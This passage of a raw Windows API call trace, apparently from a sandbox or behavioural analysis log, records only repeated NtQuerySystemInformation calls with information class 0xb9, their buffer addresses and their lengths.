ResultLength=0x0) [0280.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0280.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0280.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0280.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0280.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x58, ResultLength=0x0) [0280.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0280.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0280.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0280.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0280.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0280.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x28, ResultLength=0x0) [0280.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0280.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0280.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0280.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0280.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc780, Length=0x20, ResultLength=0x0) [0280.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc780, Length=0x20, ResultLength=0x0) [0280.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc780, Length=0x20, ResultLength=0x0) [0280.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0280.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0280.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0280.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0280.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0280.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x58, ResultLength=0x0) [0280.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0280.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0280.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0280.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0280.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0280.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x28, ResultLength=0x0) [0280.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0280.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0280.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0280.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0280.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0280.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0280.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0280.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0280.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0280.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0280.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0280.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0280.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x58, ResultLength=0x0) [0280.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0280.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0280.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0280.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0280.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0280.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8b0, Length=0x28, ResultLength=0x0) [0280.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0280.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0280.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0280.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0280.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0280.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0280.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7a0, Length=0x20, ResultLength=0x0) [0280.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc720, Length=0x20, ResultLength=0x0) [0280.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc720, Length=0x20, ResultLength=0x0) [0280.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc720, Length=0x20, ResultLength=0x0) [0280.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0280.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0280.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0280.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0280.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0280.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0280.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0280.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0280.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0280.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0280.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0280.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0280.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0280.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc820, Length=0x20, ResultLength=0x0) [0280.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc820, Length=0x20, ResultLength=0x0) [0280.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd88, Length=0x50, ResultLength=0x0) [0280.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccb0, Length=0x38, ResultLength=0x0) [0280.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcae0, Length=0x28, ResultLength=0x0) [0280.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcae0, Length=0x28, ResultLength=0x0) [0280.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcae0, Length=0x28, ResultLength=0x0) [0280.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcae0, Length=0x28, ResultLength=0x0) [0280.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0280.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccb0, Length=0x38, ResultLength=0x0) [0280.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x28, ResultLength=0x0) [0280.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x28, ResultLength=0x0) [0280.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 